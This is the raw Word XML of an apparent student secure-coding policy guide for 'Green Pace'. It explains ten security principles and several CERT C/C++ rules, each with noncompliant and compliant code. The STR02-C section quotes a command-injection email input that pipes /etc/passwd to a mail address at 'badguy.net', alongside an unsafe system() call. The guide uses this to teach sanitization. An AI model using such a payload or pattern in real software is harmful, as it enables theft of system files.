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Green Pace Developer: Security Policy Guide Template</w:t>
      </w:r>
    </w:p>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Colin Aheron</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="460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object w:dxaOrig="3724" w:dyaOrig="4838">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:186.200000pt;height:241.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Green Pace Secure Development Policy </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Contents</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b/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="28"/>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Overview</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Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="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Understanding the Hierarchy of Principles, Policies, Standards, Procedures, and Guidelines</w:t>
        </w:r>
      </w:hyperlink>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Scope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document applies to all staff that create, deploy, or support custom software at Green Pace.</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Module Three Milestone </w:t>
      </w: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Ten Core Security Principles</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="2542"/>
        <w:gridCol w:w="8238"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="288" w:hRule="auto"/>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Principles</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short paragraph explaining each of the 10 principles of security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="552" w:hRule="auto"/>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18"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Validate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:b/>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Input Data</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validation confirms that only properly structured data is processed, reducing the risk of unexpected behavior or exploits.</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22"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Heed Compiler Warnings</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Compiler warnings often highlight potential flaws in code. Addressing these warnings can help prevent bugs and vulnerabilities from slipping through into production code.</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25"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Architect and Design for Security Policies</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must be considered from the beginning stages of software design. This involves integrating security policies into the architecture to ensure that the system enforces rules for data protection and user access control.</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28"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Keep It Simple</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Complexity is the enemy of security. Keeping code and systems simple minimizes the risk of introducing hidden vulnerabilities and makes it easier to identify and fix issues.</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31"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Default Deny</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default deny policy means access should be denied by default, and only explicitly allowed actions are permitted. This principle ensures that unauthorized actions are automatically blocked.</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34"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Adhere to the Principle of Least Privilege</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and processes should only have the minimum level of access needed to perform their tasks. Limiting privileges reduces the potential damage in the event of a compromise.</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37"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Sanitize Data Sent to Other Systems</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being transmitted between systems must be sanitized to prevent vulnerabilities such as injection attacks. This ensures that the data cannot be used to execute harmful commands on the receiving system.</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40"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Practice Defense in Depth </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Employing multiple layers of security controls provides redundancy, so that if one layer fails, others can still offer protection. This approach strengthens the overall security posture by building overlapping defenses.</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43"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Use Effective Quality Assurance Techniques</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Incorporating robust quality assurance methods like code reviews, automated testing, and static analysis helps identify and fix security vulnerabilities during development, ensuring higher code reliability and safety.</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46"/>
              </w:numPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="342" w:hanging="36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Adopt a Secure Coding Standard</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a recognized secure coding standard ensures consistency in writing secure code. These standards provide guidelines to avoid common vulnerabilities and foster practices that promote secure software development.</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C/C++ Ten Coding Standards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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 1</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Implement abstract data types using opaque types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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DCL12-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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 data types are not restricted to object-oriented languages such as C++ and Java. They should be created and used in C language programs as well. Abstract data types are most effective when used with private (opaque) data types and information hiding.</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26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Noncompliant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implementation of the string_mx type is fully visible to the user of the data type after including the string_m.h file. Programmers are consequently more likely to directly manipulate the fields within the structure, violating the software engineering principles of information hiding and data encapsulation and increasing the probability of developing incorrect or nonportable code.</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 string_mx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size_t size;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size_t maxsize;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unsigned char strtype;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 *cstr;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typedef struct string_mx string_mx;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declarations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 errno_t strcpy_m(string_mx *s1, const string_mx *s2);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 errno_t strcat_m(string_mx *s1, const string_mx *s2);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8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compliant solution reimplements the string_mx type as a private type, hiding the implementation of the data type from the user of the managed string library. To accomplish this, the developer of the private data type creates two header files: an external string_m.h header file that is included by the user of the data type and an internal file that is included only in files that implement the managed string abstract data type.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external string_m.h file, the string_mx type is defined to be an instance of struct string_mx, which in turn is declared as an incomplete type:</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 string_mx;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typedef struct string_mx string_mx;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declarations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 errno_t strcpy_m(string_mx *s1, const string_mx *s2);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 errno_t strcat_m(string_mx *s1, const string_mx *s2);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 string_mx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size_t size;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size_t maxsize;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unsigned char strtype;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 *cstr;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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</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Adhere to the Principle of Least Privilege: By using opaque types to implement abstract data types, direct access to the internal structure of the type is restricted. This ensures that users or other parts of the code only interact with the data through defined interfaces, minimizing the risk of unintended modifications or misuse. Restricting access limits the potential for bugs, vulnerabilities, or unintended behaviors caused by improper usage of the internal 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Architect and Design for Security Policies: Implementing abstract data types with opaque types enforces encapsulation and information hiding, which are foundational to secure software design. By hiding the implementation details and exposing only a well-defined interface, this design ensures that changes to the internal structure do not impact the rest of the system. This approach reduces the likelihood of introducing errors or security issues during modifications or upgrades.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Unlikely</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tab/>
            </w:r>
          </w:p>
        </w:tc>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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L3</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Axivion Bauhaus Suite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CertC-DCL12</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 provided</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LDRA tool suite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9.7.1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104 D</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Partially implemented</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Polyspace Bug Finder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R2024a</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 C: Rec. DCL12-C</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Checks for structure or union object implementation visible in file where pointer to this object is not dereferenced (rule partially covered)</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Parasoft C/C++test</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2023.1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CERT_C-DCL12-a</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a pointer to a structure or union is never dereferenced within a translation unit, then the implementation of the object should be hidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 2</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Value-returning functions must return a value from all exit paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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MSC52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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 Standard, [stmt.return], paragraph 2 [ISO/IEC 14882-2014], states the following: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Flowing off the end of a function is equivalent to a return with no value; this results in undefined behavior in a value-returning function.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value-returning function must return a value from all code paths; otherwise, it will result in undefined behavior. This includes returning through less-common code paths, such as from a function-try-block, as explained in the C++ Standard, [except.handle], paragraph 15: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Flowing off the end of a function-try-block is equivalent to a return with no value; this results in undefined behavior in a value-returning function (6.6.3).</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26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Noncompliant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noncompliant code example, the programmer forgot to return the input value for positive input, so not all code paths return a value.</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absolute_value(int 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&lt; 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8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compliant solution, all code paths now return a value.</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absolute_value(int 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&lt; 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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Validate Input Data: Ensuring that all code paths in a value-returning function return a value is a form of input validation. This standard implicitly enforces proper handling of inputs by guaranteeing that for every possible input (or code path), the function behaves predictably and does not result in undefined behavior. This improves the reliability of the function and ensures that the function correctly processes all inputs.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Effective Quality Assurance Techniques: Thorough code reviews, testing, and static analysis can detect scenarios where a value-returning function fails to return a value on all paths. Ensuring compliance with this standard during development helps catch such flaws early, preventing undefined behavior from making its way into production code. This is crucial for maintaining high code quality and software reliability.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Probable</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p>
        </w:tc>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P8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L2</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Astrée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22.10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return-implicit</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Fully checked</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LDRA tool suite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9.7.1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 36 S</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 36 S</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Parasoft C/C++test</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2023.1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CERT_CPP-MSC52-a</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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exit paths from a function, except main(), with non-void return type shall have an explicit return statement with an expression</w:t>
            </w:r>
          </w:p>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Polyspace Bug Finder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R2024a</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 C++: MSC52-CPP</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Checks for missing return statements (rule partially covered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 3</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Detect errors when converting a string to a number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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String Correctness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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ERR34-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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process of parsing an integer or floating-point number from a string can produce many errors. The string might not contain a number. It might contain a number of the correct type that is out of range (such as an integer that is larger than INT_MAX). The string may also contain extra information after the number, which may or may not be useful after the conversion. These error conditions must be detected and addressed when a string-to-number conversion is performed using a C Standard Library function.</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26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Noncompliant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noncompliant code example converts the string token stored in the buff to a signed integer value using the atoi() function:</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&lt;stdlib.h&gt;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func(const char *buff)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si;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(buff)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 = atoi(buff);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Handle error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8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strtol(), strtoll(), strtoimax()), strtoul(), strtoull(), strtoumax(), strtof(), strtod(), and strtold() functions convert a null-terminated byte string to long int, long long int, intmax_t, unsigned long int, unsigned long long int, uintmax_t, float, double, and long double representation, respectively.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compliant solution uses strtol() to convert a string token to an integer and ensures that the value is in the range of int:</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&lt;errno.h&gt;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&lt;limits.h&gt;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&lt;stdlib.h&gt;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func(const char *buff)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 *end;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si;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errno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long sl = strtol(buff, &amp;end,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(end == buff)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fprintf(stderr, "%s: not a decimal number\n", buff);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if ('\0' != *end)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fprintf(stderr, "%s: extra characters at end of input: %s\n", buff, end);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if ((LONG_MIN == sl || LONG_MAX == sl) &amp;&amp; ERANGE == errno)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fprintf(stderr, "%s out of range of type long\n", buff);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if (sl &gt; INT_MAX)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fprintf(stderr, "%ld greater than INT_MAX\n", sl);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if (sl &lt; INT_MIN)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fprintf(stderr, "%ld less than INT_MIN\n", sl);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 = (int)sl;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Process si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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Validate Input Data: This standard enforces thorough input validation when converting strings to numeric values. Errors such as non-numeric strings, out-of-range values, or extraneous characters must be identified and appropriately handled to ensure that only valid, expected data is processed. This prevents unexpected behavior, ensures correctness, and reduces the likelihood of introducing vulnerabilities like buffer overflows or crashes due to improper input handling.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Sanitize Data Sent to Other Systems: By validating and sanitizing the string-to-number conversion, this standard ensures that only properly converted numeric values are processed or sent to other systems. This prevents malicious or malformed data from being inadvertently propagated, reducing the risk of injection attacks or unexpected failures in downstream systems.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Unlikely</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p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>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P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L3</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Axivion Bauhaus Suite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CertC-ERR34</w:t>
              <w:tab/>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 provided</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Polyspace Bug Finder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R2024a</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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 C: Rule ERR34-C</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Checks for unsafe conversion from string to numeric value (rule fully covered)</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Clang</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cert-err34-c</w:t>
              <w:tab/>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Checked by clang-tidy</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LDRA tool suite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9.7.1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S</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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Fully implemented</w:t>
            </w:r>
          </w:p>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0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 4</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Sanitize data passed to complex subsystems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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STR02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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data passed to complex subsystems may contain special characters that can trigger commands or actions, resulting in a software vulnerability. As a result, it is necessary to sanitize all string data passed to complex subsystems so that the resulting string is innocuous in the context in which it will be interpreted.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are some examples of complex subsystems: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 processor via a call to system() or similar functionExternal programs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Relational databases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Third-party commercial off-the-shelf components (for example, an enterprise resource planning subsystem)</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26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Noncompliant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risk, of course, is that the user enters the following string as an email address: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bogus@addr.com; cat /etc/passwd  | mail some@badguy.net</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sprintf(buffer, "/bin/mail %s &lt; /tmp/email", addr);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system(buffer);</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8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necessary to ensure that all valid data is accepted, while potentially dangerous data is rejected or sanitized. Doing so can be difficult when valid characters or sequences of characters also have special meaning to the subsystem and may involve validating the data against a grammar. In cases where there is no overlap, whitelisting can be used to eliminate dangerous characters from the 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whitelisting approach to data sanitization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. </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char ok_chars[] = "abcdefghijklmnopqrstuvwxyz"</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"ABCDEFGHIJKLMNOPQRSTUVWXYZ"</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"1234567890_-.@";</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 user_data[] = "Bad char 1:} Bad char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 *cp = user_data; /* Cursor into string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char *end = user_data + strlen( user_data);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(cp += strspn(cp, ok_chars); cp != end; cp += strspn(cp, ok_chars))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*cp = '_';</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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Sanitize Data Sent to Other Systems: The compliant code ensures that only allowed characters are included in strings sent to subsystems like relational databases, command processors, or external programs. By whitelisting acceptable characters and replacing invalid ones, this standard prevents harmful commands or malicious inputs from being executed, reducing the risk of SQL injection or command injection vulnerabilities.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Validate Input Data: Before passing data to a subsystem, it is necessary to confirm that the data conforms to an expected format. Validation ensures that only structured, safe data is processed, further reducing the potential for vulnerabilities. This includes ensuring the data is appropriate for the context in which it will be used, such as a database query or external command.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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Likely</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
